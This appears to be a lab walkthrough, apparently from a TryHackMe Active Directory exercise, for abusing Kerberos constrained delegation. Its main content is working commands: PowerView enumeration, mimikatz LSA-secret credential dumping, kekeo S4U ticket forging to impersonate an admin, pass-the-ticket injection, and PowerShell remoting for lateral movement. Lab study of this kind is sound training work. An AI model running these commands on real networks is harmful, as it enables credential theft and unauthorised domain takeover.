To detect constrained delegation, use PowerView:

Import-Module PowerView.ps1
Get-NetUser -TrustedToAuth 

If the command prints anything, then we have some services or users that are allowed to authenticate elsewhere. If we have enough permissions, we can dump their credentials and use them for lateral movement

Note

The below example assumes that the vulnerable user is a service account that can authenticate against HTTP and WSMAN on THMSERVER1.

With admin privileges on a compromised domain-joined machine, we can dump the delegation-enabled user’s cleartext credentials from LSA secrets (if the option “store passwords with reversible encryption” is enabled).

.\mimikatz.exe "token::elevate" "lsadump::secrets" "exit"

Look for cur/text field, or if not present, the NTLM fields. Then exit out of mimikatz to prevent the privileged token from being used in the following attack.

Using kekeo to get a TGT file using cleartext credentials, then use the obtained service’s TGT to generate a TGS of the admin user (since the svcIIS user has SeImpersonate privilege).

kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
kekeo # tgs::s4u /tgt:[email protected][email protected] /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc
kekeo # tgs::s4u /tgt:[email protected][email protected] /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

Use Mimikatz again to inject the TGS/service tickets into memory:

.\mimikatz.exe "privilege::debug" \
               "kerberos::ptt [email protected][email protected]" \
               "kerberos::ptt [email protected][email protected]" \
               "exit"

Use the injected ticket to authenticate for PowerShell remoting through wsman:

New-PSSession -ComputerName thmserver1.za.tryhackme.loc
Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc

If PowerShell fails to create PS session, try closing and reopening it (and reinjecting the tickets).